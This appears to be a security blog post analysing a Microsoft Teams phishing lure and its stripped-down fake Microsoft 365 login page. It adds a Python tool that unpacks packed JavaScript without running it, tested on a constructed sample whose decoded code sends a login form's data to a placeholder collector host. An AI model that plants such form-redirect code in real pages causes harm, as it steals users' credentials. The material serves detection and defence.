
Unquestionably one of the most spoofed brands in email attacks over the past several years has been Microsoft. Recently, threat actors have continued the trend with some clever spoofed Microsoft Teams emails. One of the most popular variations of the MS Teams lure mimics the legitimate notification sent when a user is added to a Teams group. This example originated in Hungary from the domain godmanmedicalsi[.]store. Generic TLDs such as [.]store are commonly abused at times when hosting companies run yearly registration deals to promote a specific gTLD. This domain was registered through Namecheap, which currently offers the first year for [.]store domains at .98 (USD); threat actors love a bargain as much as anyone.

The payload link leads to a phishing portal that mimics the Microsoft 365 OWA login page design. However, this actor removed all the Microsoft branding and the favicon, likely to avoid detection by security products and keep the page active for a longer duration.

In addition to removing the Microsoft branding, the threat actor obfuscated the source code by packing the JavaScript. We have unpacked it in the text file below to see how and where they were posting the stolen credentials.
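The unpacking step the post refers to can be done statically, without running the script in a browser or a JS engine. The following Python is an added example, not the post's text file and not the kit's code: it reverses the common `eval(function(p,a,c,k,e,d){...})` packer by decoding each word token back through the keyword list, then lists the URLs the restored source contains. The packed sample and its placeholder domain are constructed for this example.

```python
import re
import string

ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase  # packer digits, up to base 62

# The packer's trailing call:  }('payload', base, count, 'w0|w1|...'.split('|'), ...
PACKED_RE = re.compile(
    r"\}\s*\('(.*?)',\s*(\d+),\s*(\d+),\s*'(.*?)'\.split\('\|'\)", re.DOTALL)


def decode_index(token, base):
    value = 0
    for ch in token:
        digit = ALPHABET.find(ch)
        if digit < 0 or digit >= base:
            return None  # e.g. '_' or a digit beyond the base: the packer never emits these
        value = value * base + digit
    return value


def unpack(script):
    """Reverse eval(function(p,a,c,k,e,d){...}(...)) packing without executing any JavaScript."""
    m = PACKED_RE.search(script)
    if not m:
        raise ValueError("no p,a,c,k,e,d packer call found")
    payload, base, count = m.group(1), int(m.group(2)), int(m.group(3))
    words = m.group(4).split("|")
    if len(words) != count:
        raise ValueError(f"keyword list has {len(words)} entries but the packer says {count}")
    payload = re.sub(r"\\(['\\])", r"\1", payload)  # undo the JS string-literal escaping

    def restore(match):
        token = match.group(0)
        idx = decode_index(token, base)
        # An empty keyword slot means the token already is its own word (e.g. a literal 0).
        if idx is not None and idx < count and words[idx]:
            return words[idx]
        return token
    return re.sub(r"\b\w+\b", restore, payload)


def post_destinations(script):
    """URLs present in the unpacked source: where a kit sends what the form collects."""
    return re.findall(r"https?://[^\s'\"]+", unpack(script))


# Constructed sample (not the kit from the post): packed form of a snippet that repoints a login form.
SAMPLE = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};"
    "if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];"
    "e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)"
    "+'\\\\b','g'),k[c])}}return p}('2 1=3.4[0];1.5=\\'6://7.8/9.a\\';1.b=\\'c\\';',62,13,"
    "'|f|var|document|forms|action|https|collector|example|post|php|method|POST'.split('|'),0,{}))"
)
```

Running `post_destinations(SAMPLE)` returns the placeholder collection URL, which is the detail worth blocking and hunting for in proxy logs once extracted from a real kit.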

Users need to be extra vigilant with any Microsoft-themed email given how often the brand is spoofed. By paying close attention to the sender address and the destination URL, this email could easily have been flagged as phishing. Navigating directly to the source (Teams, in this case) rather than following the link is always a good way to avoid falling prey to phishing attacks.
